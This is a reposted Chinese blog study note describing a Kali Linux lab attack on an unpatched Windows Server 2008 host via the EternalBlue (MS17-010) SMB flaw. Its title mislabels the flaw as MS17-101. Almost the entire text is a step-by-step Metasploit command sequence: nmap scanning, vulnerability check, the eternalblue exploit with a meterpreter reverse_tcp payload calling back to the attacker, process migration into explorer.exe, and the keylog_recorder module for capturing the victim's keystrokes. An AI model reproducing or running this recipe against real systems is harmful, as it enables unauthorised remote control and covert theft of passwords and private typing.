當前位置：首頁 > 运维知识 > linux >内容正文

linux

linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录

發布時間：2024/9/15 linux 35 豆豆

生活随笔收集整理的這篇文章主要介紹了 linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

環境：? ? ? ? 攻擊機：192.168.200.101? ?//kali Linux 2020

靶機：192.168.200.103? ? (未打MS17-010補丁windowsServices2008.x64)

1：msfconsole? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? //進入metaploit

2：nmap -sV 192.168.200.103(檢查445端口是否開放)? ? ? ? //使用nmap探測主機信息

3：利用msf的auxiliary模塊進行漏洞驗證

search ms17-010? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? //查詢MS17-010永恒之藍漏洞信息

use??auxiliary/scanner/smb/smb_ms17_010? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?//使用輔助掃描smb，是否存在永恒之藍漏洞

set??rhost??192.168.200.103? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ???//設置目標IP

set??rport? ?445? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? //設置目標端口

run? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???//開始掃描

4：設置攻擊目標、端口、本機

use??exploit/windows/smb/ms17_010_eternalblue? ? ? ? ? ? ? ?? ?? ? //利用永恒之藍漏洞

set??rhost??192.168.200.103? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ???//設置目標IP

set??rport? ?445? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?//設置目標端口

set lhost 192.168.200.101? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ? //設置kali linux IP地址

set??payload? ?windows/x64/meterpreter/reverse_tcp? ? ? ?? ?? ?//使用reverse_tcp攻擊荷載

show options? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???//查看是否設置完成

run? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? //開始攻擊

若成功則拿到目標機的shell

6：輸入ps查看進程

#找到explorer.exe進程(記住PID)

PID? ?PPID??Name? ?? ?? ?? ?? ?Arch??Session??User? ?? ?? ?? ?? ?? ?? ?? ???Path

---? ?----??----? ?? ?? ?? ?? ?----??-------??----? ?? ?? ?? ?? ?? ?? ?? ???----

1996??1980??explorer.exe? ?? ? x86? ?0? ?? ???VIOLET\violetevergarden? ?? ? C:\WINDOWS\Explorer.EXE

7：meterpreter > migrate 1996 ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ???//遷移會話

8：run post/windows/capture/keylog_recorder? ? ? ? ? ? ? ? //進行鍵盤記錄

#鍵盤記錄完成后會生成一個文件，文件路徑會在攻擊完成后顯示，注意，鍵盤記錄需要按ctel+c結束。

————有些小伙伴可能在拿到shell后可能會有亂碼這里給予解決方法：輸入命令：chcp 65001 即可

以上是生活随笔為你收集整理的linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。